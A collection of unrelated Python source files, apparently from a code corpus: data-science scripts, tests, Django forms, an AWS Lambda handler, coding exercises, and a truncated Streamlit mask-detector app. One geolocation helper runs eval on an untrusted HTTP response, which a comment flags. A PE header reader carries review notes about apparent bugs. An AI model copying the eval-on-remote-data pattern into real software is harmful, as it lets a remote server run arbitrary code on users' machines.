info_dataset = dataset[["nome", "plataforma", "ano", "genero", "editora"]].copy()
# show a few dataset rows
# print(dataset.head())
# check for empty values in the dataset
# print(dataset.isna().sum())
# for k-means, keep platform and genre; the name will become the index
vendas_dataset = dataset[["nome", "plataforma", "genero"]]
# print(vendas_dataset.head())
# print(vendas_dataset.isna().sum())
# only a few rows (26 each) have empty platform/genre, so drop those rows
vendas_dataset = vendas_dataset.dropna()
# keep the name column so it can be restored after scaling
nomes = vendas_dataset["nome"]
nomes = nomes.values
# set the name as index; no row is missing this information
vendas_dataset.set_index(keys="nome", inplace=True)
# do the same for info_dataset
info_dataset.set_index(keys="nome", inplace=True)
# encode the non-numeric columns as numeric labels
# first the platform
vendas_dataset["plataforma"] = vendas_dataset["plataforma"].astype(str)
label_encoder_p = LabelEncoder()
label_encoder_p.fit(vendas_dataset["plataforma"])
vendas_dataset["plataforma"] = label_encoder_p.transform(vendas_dataset["plataforma"])
# then the genre
vendas_dataset["genero"] = vendas_dataset["genero"].astype(str)
label_encoder_g = LabelEncoder()
label_encoder_g.fit(vendas_dataset["genero"])
vendas_dataset["genero"] = label_encoder_g.transform(vendas_dataset["genero"])
# print(vendas_dataset.info())
# print(vendas_dataset.isna().sum())
# scale both features into [0, 1]
scaler = MinMaxScaler()
vendas_dataset_escalado = scaler.fit_transform(vendas_dataset)
vendas_dataset_escalado = pd.DataFrame(vendas_dataset_escalado)
# restore the name column and set it as index again
vendas_dataset_escalado["nome"] = nomes
vendas_dataset_escalado.set_index(keys="nome", inplace=True)
# run k-means clustering
k_means = AlgoritmoDeKMeans(vendas_dataset_escalado)
vendas_dataset_result = k_means.insere_coluna_de_grupo(vendas_dataset_escalado)
# interactive menu loop
menu = "Menu \nop1. Encontra o erro em 30 possibilidades diferentes, de 1 a 30 grupos \nop2. Verifica os valores dos centros encontrados pelo algoritmo \nop3. Mostra indicações de um grupo a sua escolha (1 a 14) \nop0. Finaliza programa"
resposta = ""
while (True):
    print()
    print(menu)
    resposta = input("escolha uma alternativa: ")
    if (resposta=="op1"):
        print("Encontra o erro em 30 possibilidades diferentes, de 1 a 30 grupos")
        k_means.mostra_erro_com_30_grupos_diferentes(vendas_dataset_escalado)
    if (resposta=="op2"):
        print("Verifica os valores dos centros encontrados pelo algoritmo")
        print(k_means.retorna_centros())
    if (resposta=="op3"):
        print("Mostra indicações de um grupo a sua escolha (1 a 14)")
        n_grupo=-1
        while(True):
            str_n_grupo = input("escolha um grupo de 1 a 14")
            # FIX: ignore non-numeric input instead of crashing with ValueError
            try:
                n_grupo = int(str_n_grupo)
            except ValueError:
                continue
            n_grupo = n_grupo-1
            if (n_grupo>=0 and n_grupo<=13):
                break
        # FIX: show the 1-based group number the user chose (n_grupo is 0-based;
        # the old code printed the chosen number minus one)
        print("Grupo escolhido: %d" % (n_grupo + 1))
        k_means.mostra_jogos_de_um_grupo(n=n_grupo, dataset_k_means=vendas_dataset_result, dataset_completo=info_dataset)
    if (resposta=="op0"):
        break
print("\n\nPrograma finalizado")
|
import numpy as np
import osmo_camera.rgb.convert as module
def test_convert_to_bgr():
    """to_bgr should swap the first and third channels of every pixel."""
    rgb_image = np.array(
        [
            [["r1", "g1", "b1"], ["r2", "g2", "b2"]],
            [["r3", "g3", "b3"], ["r4", "g4", "b4"]],
        ]
    )
    # Same pixels with the channel axis reversed (RGB -> BGR).
    bgr_expected = rgb_image[:, :, ::-1]
    np.testing.assert_array_equal(module.to_bgr(rgb_image), bgr_expected)
class TestConvertToPIL(object):
    """Tests for module.to_PIL: floats in [0, 1] become uint8 (x * 255, truncated)."""
    def test_convert_to_PIL_no_warnings(self, mocker):
        """In-range values convert exactly and no warning is logged."""
        mock_warning_logger = mocker.patch.object(module.logger, "warning")
        image = np.array([[[0, 0.5, 1], [1, 0.3, 0.1]]])
        expected = np.array([[[0, 127, 255], [255, 76, 25]]]).astype("uint8")
        PIL_image = module.to_PIL(image)
        np.testing.assert_array_equal(np.array(PIL_image), expected)
        mock_warning_logger.assert_not_called()
    def test_convert_to_PIL_with_warnings(self, mocker):
        """Out-of-range values are clamped to uint8 bounds and a warning is logged once."""
        mock_warning_logger = mocker.patch.object(module.logger, "warning")
        image = np.array([[[0, 0.5, 1], [1, 3, -0.1]]])
        expected = np.array(
            [
                # Check overflow values truncate properly:
                # 3 from input array should be the maximum value
                # -0.1 from input array should be the minimum value
                [[0, 127, 255], [255, 255, 0]]
            ]
        ).astype("uint8")
        PIL_image = module.to_PIL(image)
        np.testing.assert_array_equal(np.array(PIL_image), expected)
        mock_warning_logger.assert_called_once()
|
#!/usr/bin/python3
#minimalist python pe library
import sys
import argparse
import struct
from Utils import spaces
import DOSHeader
import PEImageOptHeader
import DOSHeaderDecoder
import PEHeaderDecoder
import PEDataDirDecoder
class PEDataDirHeader:
    """Reader for the PE optional header's data-directory array
    (VirtualAddress/Size pairs, one per directory entry).

    NOTE(review): in __init__ the is32Bit() branch picks __PE32_plus_offset
    (112) for 32-bit images and __PE32_offset (96) otherwise; the PE format
    places the data directories at offset 96 in a PE32 optional header and
    112 in PE32+, so this condition looks inverted -- confirm against real
    binaries before relying on the computed offset.
    """
    # struct format code per field (both unsigned 32-bit little-endian "I").
    __PEDataDirHeader_fmt_dict = {\
            "VirtualAddress":"I",\
            "Size":"I"}
    __PEDataDirHeader_fields = ["VirtualAddress",\
            "Size"]
    # Byte offsets of the data-directory array inside the optional header.
    __PE32_offset = 96
    __PE32_plus_offset = 112
    def __init__(self,_opt_header=None):
        # One [(name, value), (name, value)] pair list per data directory.
        self.attribute_list = [ [("VirtualAddress",0),("Size",0)] ] #array of data dir
        self.opt_header = _opt_header
        if (self.opt_header):
            self.count = self.opt_header.get_numberofrvaandsizes()
            #should check the PEOptHeaer
            self.set_offset(self.opt_header.len + self.opt_header.offset) #use upper header read lengths, then check if magic is set properly
            if (_opt_header.is32Bit()):
                # NOTE(review): see class docstring -- selecting the PE32+ offset
                # for a 32-bit image looks inverted; TODO confirm.
                self.set_offset(PEDataDirHeader().__PE32_plus_offset)
            else:
                self.set_offset(PEDataDirHeader().__PE32_offset)
        self.header_fields = PEDataDirHeader.__PEDataDirHeader_fields
        self.header_fmt_dict = PEDataDirHeader.__PEDataDirHeader_fmt_dict
    def build_from_binary(self,_filename="",_fileperms="rb"):
        """Decode up to self.count directory entries starting at self.offset.

        NOTE(review): the inner loop rebuilds each attribute_list entry from
        its own current values -- the decoded `datadir` data is never stored,
        so the list keeps its zero defaults; confirm the intended decoder
        contract before trusting the returned values.
        """
        if (_filename != ""):
            self.filename = _filename
        opt_decoder = PEDataDirDecoder.Decoder(_filename=self.filename,\
                _fileperms=self.fileperms)
        opt_header,length = opt_decoder.decode(_start=self.offset,_count=self.count)
        self.len = length
        if (opt_header == None or self.count == 0):
            return self.attribute_list
        for index,value in enumerate(opt_header):#might need to undo this hack one day lol
            try:
                for dir_index,datadir in enumerate(value):
                    VirtualAddress_name = self.attribute_list[dir_index][0][0] #the data struture choice a messy choice here at best
                    VirtualAddress_value = self.attribute_list[dir_index][0][1]
                    Size_name = self.attribute_list[dir_index][1][0]
                    Size_value = self.attribute_list[dir_index][1][1]
                    self.attribute_list[dir_index] = [(VirtualAddress_name,VirtualAddress_value),\
                            (Size_name,Size_value)]
            except IndexError:
                # Fewer pre-allocated attribute_list entries than decoded rows.
                return self.attribute_list
        return self.attribute_list
    def get_offset(self):
        """Return the current file offset of the data-directory array."""
        return self.offset
    def set_offset(self,_offset):
        """Set the file offset of the data-directory array."""
        self.offset = _offset
    def build_from_optheader(self):
        """Populate offset/count from the attached optional header, then decode."""
        if (not(self.opt_header)):
            return None
        self.filename = self.opt_header.filename
        self.fileperms = self.opt_header.fileperms
        self.offset = self.opt_header.offset + self.opt_header.len
        self.count = self.opt_header.get_numberofrvaandsizes()
        return self.build_from_binary()
    def __repr__(self):
        doc_string = "\tData Directory\n"
        #for index,field in enumerate(self.header_fields):
        #    pred = len("\t|- %s => [%s]\n")
        #    subj = (field,hex(self.attribute_list[index][1]))
        #    _spaces = spaces(line_length=30,predicate=pred,subject=subj)
        #    doc_string += "\t|- %s =>%s[%s]\n" % (field,_spaces,hex(self.attribute_list[index][1]))
        doc_string += "".join([datadir.__repr__() for datadir in self.attribute_list])
        return doc_string
|
#common elements finder function
#define a functions which take 2 list as input and return a list
#which contains common elements of both lists
#example input [1,2,5,8], [1,2,7,6]
#output [1,2]
def common_elements(lista1, lista2):
    """Return the elements present in both input lists.

    Iterates the longer of the two lists (ties go to lista2), so the result
    keeps that list's order and repeats any duplicates it contains.
    """
    longer = lista1 if len(lista1) > len(lista2) else lista2
    return [item for item in longer if item in lista1 and item in lista2]
def common_finder(l1, l2):
    """Return the items of l1 that also appear in l2 (order/duplicates follow l1)."""
    return [item for item in l1 if item in l2]
# Demo run: both implementations on the sample inputs print [1, 2].
lista1 = [1, 2, 5, 8]
lista2 = [1, 2, 7, 6]
for finder in (common_elements, common_finder):
    print(finder(lista1, lista2))
|
import dash_bootstrap_components as dbc
from dash import Input, Output, html
# Static demo layout: a three-item accordion (always_open keeps several items
# expanded at once) plus an empty div filled in by the callback below.
accordion = html.Div(
    [
        dbc.Accordion(
            [
                dbc.AccordionItem(
                    "This is the content of the first section. It has a "
                    "default ID of item-0.",
                    title="Item 1: item-0",
                ),
                dbc.AccordionItem(
                    "This is the content of the second section. It has a "
                    "default ID of item-1.",
                    title="Item 2: item-1",
                ),
                dbc.AccordionItem(
                    "This is the content of the third section. It has a "
                    "default ID of item-2.",
                    title="Item 3: item-2",
                ),
            ],
            id="accordion-always-open",
            always_open=True,
        ),
        html.Div(id="accordion-contents-open-ids", className="mt-3"),
    ]
)
# NOTE(review): `app` is not defined or imported in this file -- this snippet
# presumably expects a Dash `app` object created elsewhere; confirm before use.
@app.callback(
    Output("accordion-contents-open-ids", "children"),
    [Input("accordion-always-open", "active_item")],
)
def change_item(item):
    """Render the id(s) of the currently open accordion item(s) into the div."""
    return f"Item(s) selected: {item}"
|
"""This module contains a class which has method to clean the data """
import numpy as np
import pandas as pd
#author: Muhe Xie
#netID: mx419
#date: 11/26/2015
class Clean_Raw_Data:
    """Holds a raw inspection DataFrame and produces a cleaned copy for analysis."""

    def __init__(self, origin_data):
        """Keep a reference to the raw DataFrame."""
        self.raw_data = origin_data

    def get_cleaned_data(self):
        """Return a cleaned DataFrame.

        Keeps only CAMIS/BORO/GRADE/'GRADE DATE', drops duplicate rows,
        restricts grades to A/B/C, removes rows with missing values or a
        'Missing' borough, and appends a parsed FORMAT_DATE column.
        """
        subset = self.raw_data[['CAMIS', 'BORO', 'GRADE', 'GRADE DATE']]
        subset = subset.drop_duplicates()
        # Valid letter grades only; NaN grades fail isin() just as they
        # failed the original equality chain.
        subset = subset[subset['GRADE'].isin(['A', 'B', 'C'])]
        subset = subset.dropna()
        subset = subset[subset['BORO'] != 'Missing']
        # Build the parsed-date column as a separate frame and concatenate,
        # avoiding a chained-assignment slice warning.
        parsed_dates = pd.DataFrame(pd.to_datetime(subset['GRADE DATE']))
        parsed_dates = parsed_dates.rename(columns={'GRADE DATE': 'FORMAT_DATE'})
        return pd.concat([subset, parsed_dates], axis=1)
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.docker.target_types import (
DockerImageTags,
DockerImageTagsRequest,
DockerImageTarget,
)
from pants.backend.helm.dependency_inference import deployment as infer_deployment
from pants.backend.helm.subsystems.post_renderer import (
HELM_POST_RENDERER_CFG_FILENAME,
HelmPostRenderer,
)
from pants.backend.helm.target_types import (
HelmChartTarget,
HelmDeploymentFieldSet,
HelmDeploymentTarget,
)
from pants.backend.helm.testutil import HELM_CHART_FILE, HELM_TEMPLATE_HELPERS_FILE
from pants.backend.helm.util_rules import post_renderer
from pants.backend.helm.util_rules.post_renderer import HelmDeploymentPostRendererRequest
from pants.backend.helm.util_rules.renderer import (
HelmDeploymentCmd,
HelmDeploymentRequest,
RenderedHelmFiles,
)
from pants.backend.helm.util_rules.testutil import _read_file_from_digest
from pants.backend.helm.util_rules.tool import HelmProcess
from pants.backend.shell.target_types import ShellCommandRunTarget, ShellSourcesGeneratorTarget
from pants.backend.shell.util_rules import shell_command
from pants.core.goals import package
from pants.core.goals.run import rules as run_rules
from pants.core.util_rules import source_files
from pants.engine.addresses import Address
from pants.engine.fs import CreateDigest, Digest, FileContent
from pants.engine.process import ProcessResult
from pants.engine.rules import QueryRule, rule
from pants.engine.target import Target
from pants.engine.unions import UnionRule
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, RuleRunner
class CustomTestImageTagRequest(DockerImageTagsRequest):
    """Tag request that only applies to targets whose name contains "bar"."""

    @classmethod
    def is_applicable(cls, target: Target) -> bool:
        target_name = target.address.target_name
        return "bar" in target_name
@rule
async def custom_test_image_tags(_: CustomTestImageTagRequest) -> DockerImageTags:
    """Test rule: always resolve applicable docker images to the fixed "custom-tag"."""
    return DockerImageTags(["custom-tag"])
@pytest.fixture
def rule_runner() -> RuleRunner:
    """RuleRunner wired with the Helm/Docker/shell rules these tests exercise,
    plus the custom image-tag rule so "bar" targets receive "custom-tag"."""
    rule_runner = RuleRunner(
        target_types=[
            HelmChartTarget,
            HelmDeploymentTarget,
            DockerImageTarget,
            ShellSourcesGeneratorTarget,
            ShellCommandRunTarget,
        ],
        rules=[
            *infer_deployment.rules(),
            *source_files.rules(),
            *post_renderer.rules(),
            *run_rules(),
            *shell_command.rules(),
            *package.rules(),
            custom_test_image_tags,
            UnionRule(DockerImageTagsRequest, CustomTestImageTagRequest),
            QueryRule(HelmPostRenderer, (HelmDeploymentPostRendererRequest,)),
            QueryRule(RenderedHelmFiles, (HelmDeploymentRequest,)),
            QueryRule(ProcessResult, (HelmProcess,)),
        ],
    )
    source_root_patterns = ("src/*",)
    rule_runner.set_options(
        [f"--source-root-patterns={repr(source_root_patterns)}"],
        env_inherit=PYTHON_BOOTSTRAP_ENV,
    )
    return rule_runner
_TEST_GIVEN_CONFIGMAP_FILE = dedent(
"""\
apiVersion: v1
kind: ConfigMap
metadata:
name: foo-config
data:
foo_key: foo_value
"""
)
_TEST_EXPECTED_CONFIGMAP_FILE = (
dedent(
"""\
---
# Source: mychart/templates/configmap.yaml
"""
)
+ _TEST_GIVEN_CONFIGMAP_FILE
)
def test_can_prepare_post_renderer(rule_runner: RuleRunner) -> None:
    """End-to-end check of the Helm deployment post-renderer.

    Builds a chart whose pod template references `docker_image` targets and
    asserts that (a) the generated post-renderer config maps each container
    image path to the resolved image ref -- including the "custom-tag"
    injected by CustomTestImageTagRequest for the *bar* targets -- and
    (b) rendering the deployment applies those replacements while leaving
    non-matching manifests (the ConfigMap) untouched.
    """
    rule_runner.write_files(
        {
            "src/mychart/BUILD": "helm_chart()",
            "src/mychart/Chart.yaml": HELM_CHART_FILE,
            "src/mychart/values.yaml": dedent(
                """\
                pods: []
                """
            ),
            "src/mychart/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
            "src/mychart/templates/configmap.yaml": _TEST_GIVEN_CONFIGMAP_FILE,
            "src/mychart/templates/pod.yaml": dedent(
                """\
                {{- $root := . -}}
                {{- range $pod := .Values.pods }}
                ---
                apiVersion: v1
                kind: Pod
                metadata:
                  name: {{ template "fullname" $root }}-{{ $pod.name }}
                  labels:
                    chart: "{{ $root.Chart.Name }}-{{ $root.Chart.Version | replace "+" "_" }}"
                spec:
                  initContainers:
                    - name: myapp-init-container
                      image: {{ $pod.initContainerImage }}
                  containers:
                    - name: busy
                      image: busybox:1.29
                    - name: myapp-container
                      image: {{ $pod.appImage }}
                {{- end }}
                """
            ),
            "src/deployment/BUILD": "helm_deployment(name='test', dependencies=['//src/mychart'])",
            "src/deployment/values.yaml": dedent(
                """\
                pods:
                - name: foo
                  initContainerImage: src/image:init_foo
                  appImage: src/image:app_foo
                - name: bar
                  initContainerImage: src/image:init_bar
                  appImage: src/image:app_bar
                """
            ),
            "src/image/BUILD": dedent(
                """\
                docker_image(name="init_foo", source="Dockerfile.init")
                docker_image(name="app_foo", source="Dockerfile.app")
                docker_image(name="init_bar", source="Dockerfile.init")
                docker_image(name="app_bar", source="Dockerfile.app")
                """
            ),
            "src/image/Dockerfile.init": "FROM busybox:1.28",
            "src/image/Dockerfile.app": "FROM busybox:1.28",
        }
    )
    # Expected post-renderer config: paths into each rendered pod mapped to
    # resolved image refs ("bar" images carry the custom tag).
    expected_config_file = dedent(
        """\
        ---
        mychart/templates/pod.yaml:
        - paths:
            /spec/containers/1/image: app_foo:latest
            /spec/initContainers/0/image: init_foo:latest
        - paths:
            /spec/containers/1/image: app_bar:custom-tag
            /spec/initContainers/0/image: init_bar:custom-tag
        """
    )
    expected_rendered_pod = dedent(
        """\
        ---
        # Source: mychart/templates/pod.yaml
        apiVersion: v1
        kind: Pod
        metadata:
          name: test-mychart-foo
          labels:
            chart: mychart-0.1.0
        spec:
          initContainers:
            - name: myapp-init-container
              image: init_foo:latest
          containers:
            - name: busy
              image: busybox:1.29
            - name: myapp-container
              image: app_foo:latest
        ---
        # Source: mychart/templates/pod.yaml
        apiVersion: v1
        kind: Pod
        metadata:
          name: test-mychart-bar
          labels:
            chart: mychart-0.1.0
        spec:
          initContainers:
            - name: myapp-init-container
              image: init_bar:custom-tag
          containers:
            - name: busy
              image: busybox:1.29
            - name: myapp-container
              image: app_bar:custom-tag
        """
    )
    deployment_addr = Address("src/deployment", target_name="test")
    tgt = rule_runner.get_target(deployment_addr)
    field_set = HelmDeploymentFieldSet.create(tgt)
    # Build the post-renderer and check its generated configuration file.
    post_renderer = rule_runner.request(
        HelmPostRenderer,
        [HelmDeploymentPostRendererRequest(field_set)],
    )
    config_file = _read_file_from_digest(
        rule_runner, digest=post_renderer.digest, filename=HELM_POST_RENDERER_CFG_FILENAME
    )
    assert config_file == expected_config_file
    # Render the deployment through the post-renderer and check the outputs.
    rendered_output = rule_runner.request(
        RenderedHelmFiles,
        [
            HelmDeploymentRequest(
                field_set=field_set,
                cmd=HelmDeploymentCmd.RENDER,
                description="Test post-renderer output",
                post_renderer=post_renderer,
            )
        ],
    )
    assert "mychart/templates/pod.yaml" in rendered_output.snapshot.files
    assert "mychart/templates/configmap.yaml" in rendered_output.snapshot.files
    rendered_configmap_file = _read_file_from_digest(
        rule_runner,
        digest=rendered_output.snapshot.digest,
        filename="mychart/templates/configmap.yaml",
    )
    assert rendered_configmap_file == _TEST_EXPECTED_CONFIGMAP_FILE
    rendered_pod_file = _read_file_from_digest(
        rule_runner, digest=rendered_output.snapshot.digest, filename="mychart/templates/pod.yaml"
    )
    assert rendered_pod_file == expected_rendered_pod
def test_use_simple_extra_post_renderer(rule_runner: RuleRunner) -> None:
    """A user-supplied `run_shell_command` post-renderer (here a pass-through
    `cat` script) should run during rendering and leave the manifest intact."""
    rule_runner.write_files(
        {
            "src/mychart/BUILD": "helm_chart()",
            "src/mychart/Chart.yaml": HELM_CHART_FILE,
            "src/mychart/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
            "src/mychart/templates/configmap.yaml": _TEST_GIVEN_CONFIGMAP_FILE,
            "src/shell/BUILD": dedent(
                """\
                shell_sources(name="scripts")
                run_shell_command(
                    name="custom_post_renderer",
                    command="src/shell/my-script.sh",
                    execution_dependencies=[":scripts"]
                )
                """
            ),
            "src/deployment/BUILD": dedent(
                """\
                helm_deployment(
                    name="test",
                    dependencies=["//src/mychart"],
                    post_renderers=["//src/shell:custom_post_renderer"]
                )
                """
            ),
        }
    )
    # We need to create the post-renderer script as a digest to ensure it has running permissions.
    post_renderer_script_digest = rule_runner.request(
        Digest,
        [
            CreateDigest(
                [
                    FileContent(
                        path="src/shell/my-script.sh",
                        content=dedent(
                            """\
                            #!/bin/bash
                            cat <&0
                            """
                        ).encode(),
                        is_executable=True,
                    )
                ]
            )
        ],
    )
    rule_runner.write_digest(post_renderer_script_digest)
    deployment_addr = Address("src/deployment", target_name="test")
    tgt = rule_runner.get_target(deployment_addr)
    field_set = HelmDeploymentFieldSet.create(tgt)
    post_renderer = rule_runner.request(
        HelmPostRenderer,
        [HelmDeploymentPostRendererRequest(field_set)],
    )
    rendered_output = rule_runner.request(
        RenderedHelmFiles,
        [
            HelmDeploymentRequest(
                field_set=field_set,
                cmd=HelmDeploymentCmd.RENDER,
                description="Test post-renderer output",
                post_renderer=post_renderer,
            )
        ],
    )
    # The pass-through post-renderer must not alter the rendered ConfigMap.
    assert "mychart/templates/configmap.yaml" in rendered_output.snapshot.files
    rendered_configmap_file = _read_file_from_digest(
        rule_runner,
        digest=rendered_output.snapshot.digest,
        filename="mychart/templates/configmap.yaml",
    )
    assert rendered_configmap_file == _TEST_EXPECTED_CONFIGMAP_FILE
|
from django import forms
from django.forms import ModelForm
from django.contrib.auth.models import User
from .models import UserProfile
class RegistrationForm(ModelForm):
    """User sign-up form; hashes the raw password before the User is saved."""

    class Meta:
        model = User
        fields = ['username', 'first_name', 'last_name', 'email', 'password']
        widgets = {
            'username': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'autofocus':'', 'placeholder' : 'Username'}),
            'first_name': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'First Name'}),
            'last_name': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'Last Name'}),
            'email': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'Email'}),
            'password': forms.PasswordInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'Password'}),
        }

    def save(self, commit=True):
        """Save the user, replacing the plain-text password with its hash.

        :param commit: when True the User is written to the database.
        :returns: the (possibly unsaved) User instance.
        """
        # FIX: super(ModelForm, self) skipped ModelForm itself in the MRO;
        # use the conventional super(RegistrationForm, self) so ModelForm's
        # save() runs as intended.
        user = super(RegistrationForm, self).save(commit=False)
        user.set_password(self.cleaned_data['password'])
        if commit:
            user.save()
        return user
class UserProfileForm(forms.ModelForm):
    """Profile-details form; `dob` offers years from 2016 back to 1940.

    NOTE(review): Meta declares both `fields` and `exclude`; `exclude` looks
    redundant because 'user' is not listed in `fields` -- confirm before
    removing either.
    """
    dob = forms.DateField(widget=forms.SelectDateWidget(years=range(2016,1939,-1), attrs={'class':"form-control", 'required':''}))
    class Meta:
        model = UserProfile
        fields = ('gender', 'bio', 'dob', 'location', 'display_pic')
        exclude = ('user', )
        widgets = {
            'gender' : forms.TextInput(attrs = {'class': "form-control", 'maxlength':1, 'autofocus':'', 'placeholder': 'Gender'}),
            'bio' : forms.Textarea(attrs = {'class': "form-control", 'maxlength':160, 'placeholder': 'Bio'}),
            'location' : forms.TextInput(attrs = {'class': "form-control", 'maxlength':50, 'placeholder': 'Location'}),
        }
|
#!/usr/bin/env python
import logging
import os
import json
import boto3
from aws import update_ssm_params
# Silence the chatty AWS SDK loggers at import time.
logging.getLogger("boto3").setLevel(logging.ERROR)
logging.getLogger("botocore").setLevel(logging.ERROR)
# Log-line layout; the {aws_request_id} placeholder is filled per invocation
# via str.format before the %-style fields are handed to logging.
LOGFMT = (
    "[%(levelname)s] %(asctime)s.%(msecs)dZ {aws_request_id} " "%(thread)d %(message)s"
)
DATEFMT = "%Y-%m-%dT%H:%M:%S"


def configure_logging(
    log_context, log_level=logging.INFO, logfmt=LOGFMT, datefmt=DATEFMT
):
    """Configure root logging with the request context baked into the format.

    :param log_context: dict of values substituted into `logfmt` (needs
        at least 'aws_request_id').
    :returns: the root logger.
    """
    resolved_fmt = logfmt.format(**log_context)
    # Drop handlers installed by a previous basicConfig (or by the Lambda
    # runtime) so basicConfig below takes effect again.
    for stale_handler in list(logging.root.handlers):
        logging.root.removeHandler(stale_handler)
    logging.basicConfig(level=log_level, datefmt=datefmt, format=resolved_fmt)
    for noisy_name in ("boto3", "botocore"):
        logging.getLogger(noisy_name).setLevel(logging.ERROR)
    return logging.getLogger()
def lambda_handler(event, context):
    """Lambda entrypoint: set up request-scoped logging, then delegate to main()."""
    log_context = {"aws_request_id": context.aws_request_id}
    configure_logging(
        log_context,
        logfmt=LOGFMT,
        datefmt=DATEFMT,
        log_level=logging.INFO,
    )
    return main(event, context)
def main(event, context):
    """Read the ASG-names JSON from SSM and refresh the derived SSM parameters."""
    logging.info(event)
    ssm_client = boto3.client("ssm")
    parameter = ssm_client.get_parameter(
        Name=os.environ["ASG_NAMES_PATH"], WithDecryption=True
    )
    # The SSM parameter value is itself a JSON document of ASG names.
    asg_name = json.loads(parameter["Parameter"]["Value"])
    logging.info(asg_name)
    update_ssm_params(asg_name)
# Local/manual invocation: mimic the Lambda environment, then run main().
if __name__ == "__main__":
    configure_logging(
        {"aws_request_id": "local"},
        logfmt=LOGFMT,
        datefmt=DATEFMT,
        log_level=logging.INFO,
    )
    os.environ["ASG_NAMES_PATH"] = '/bastion/asg_names'
    print(main(None, None))
|
from requests import get
def getgeo():
    """Prompt for an IP/hostname and print its geolocation fields (Python 2).

    Falls back to api.ipify.org to discover the caller's own IP when the
    input is blank.
    SECURITY: `eval` is run on the raw HTTP response body, i.e. untrusted
    remote data -- this should be json.loads; flagged for follow-up.
    NOTE(review): the freegeoip.net endpoint has been discontinued; confirm
    a working replacement service before relying on this function.
    """
    ip=raw_input('Enter ip or hostname to locate: ')
    if ip=='': ip=get('https://api.ipify.org').content
    for (k,v) in eval(get('https://freegeoip.net/json/'+ip).content).iteritems():
        print '{:<13}: {}'.format(k.replace('_',' ').title(),v)
def pig_latin(word):
    """Convert *word* to pig latin.

    Words longer than three letters get their first letter moved to the end
    plus an 'ay' suffix; shorter words are returned unchanged.
    """
    if len(word) <= 3:
        return word
    return word[1:] + word[0] + 'ay'


'''
Task:
Make a function that converts a word to pig latin. The rules of pig latin are:
If the word has more than 3 letters:
1. Take the first letter of a word and move it to the end
2. Add -ay to the word
Otherwise leave the word alone.
Example: hello = ellohay
'''
|
class Solution(object):
    """LeetCode 201: bitwise AND of all integers in the range [m, n]."""

    def rangeBitwiseAnd(self, m, n):
        """
        :type m: int
        :type n: int
        :rtype: int

        The AND of every integer in [m, n] equals the common high-bit prefix
        of m and n: any bit position where they differ is 0 somewhere in the
        range. Shift both right until they match, then shift back -- O(log n)
        instead of the original O(n - m) loop, which was unusable for wide
        ranges such as (1, 2**31 - 1).
        """
        shift = 0
        while m < n:
            m >>= 1
            n >>= 1
            shift += 1
        return m << shift
# Quick manual check of the solution.
obj = Solution()
# NOTE(review): m and n are assigned but the call below uses the literal
# arguments (0, 1) instead -- presumably leftover debugging; confirm intent.
m, n = 5, 7
result = obj.rangeBitwiseAnd(0, 1)
print(result)
# Generated by Django 2.2.7 on 2019-11-26 19:31
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds a `url` CharField (default '',
    max_length=64) to the `category` and `compensation` models."""

    dependencies = [
        ('info', '0009_auto_20191123_2357'),
    ]
    operations = [
        migrations.AddField(
            model_name='category',
            name='url',
            field=models.CharField(default='', max_length=64),
        ),
        migrations.AddField(
            model_name='compensation',
            name='url',
            field=models.CharField(default='', max_length=64),
        ),
    ]
|
# Rotary-dial timing: each letter costs its group's dial time, starting at
# 3 seconds for ABC and increasing per group; anything not matched below
# (e.g. W-Z) falls through to 10.
word = input()
total_time = 0
for letter in word:
    if letter in "ABC":
        total_time += 3
    elif letter in "DEF":
        total_time += 4
    elif letter in "GHI":
        total_time += 5
    elif letter in "JKL":
        total_time += 6
    elif letter in "MNO":
        total_time += 7
    elif letter in "PQRS":
        total_time += 8
    elif letter in "TUV":
        total_time += 9
    else:
        total_time += 10
print(total_time)
|
# Import all required libaries
import streamlit as st
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
import numpy as np
import cv2
import os
from PIL import Image
import matplotlib.image as mpimg
import urllib
# Operating system dependencies
# Allow duplicate OpenMP runtimes (common TF/conda clash) and silence the
# deprecated file-uploader-encoding warning in older Streamlit versions.
os.environ['KMP_DUPLICATE_LIB_OK']='True'
st.set_option('deprecation.showfileUploaderEncoding', False)
# Streamlit encourages well-structured code, like starting execution in a main() function.
def main():
    """Top-level Streamlit page: show the README, then dispatch on the
    sidebar mode (instructions / video detector / image detector / source)."""
    # Render the readme as markdown using st.markdown.
    readme_text = st.markdown(get_file_content_as_string("instructions.md"))
    # Once we have the dependencies, add a selector for the app mode on the sidebar.
    st.sidebar.title("What to do")
    app_mode = st.sidebar.selectbox("Choose the app mode",
        ["Show instructions", "Run the video detector", "Run the image detector", "Show the source code"])
    if app_mode == "Show instructions":
        st.sidebar.success('To continue select "Run the app".')
    elif app_mode == "Show the source code":
        readme_text.empty()
        st.code(get_file_content_as_string("streamlit_app.py")) # change to st_newui.py" when uploaded to Github
    elif app_mode == "Run the video detector":
        readme_text.empty()
        run_video_detector()
    elif app_mode == "Run the image detector":
        readme_text.empty()
        run_image_detector()
# HELPER FUNCTIONS
def load_face_detector_model():
    """
    Loads the OpenCV DNN face detector (Caffe prototxt + weights from the
    local ``face_detector`` directory) and returns the network object.
    (EXTENSION: Train our own face detector model)
    """
    prototxt_path = os.path.sep.join(
        ["face_detector", "deploy.prototxt"])
    weight_path = os.path.sep.join(
        ['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])
    net = cv2.dnn.readNet(prototxt_path, weight_path)
    return net
# This will make the app stay performant
@st.cache(allow_output_mutation=True)
def load_mask_model():
"""
Loads face mask detector model
"""
mask_model = load_model("mask_detector_ewan.model")
return mask_model
# Load both models once at module import so reruns reuse them.
net = load_face_detector_model() # load face detector model
model = load_mask_model() # load mask detector model
# Create confidence level slider
# NOTE(review): st.sidebar.slider args are (label, min, max, value, step);
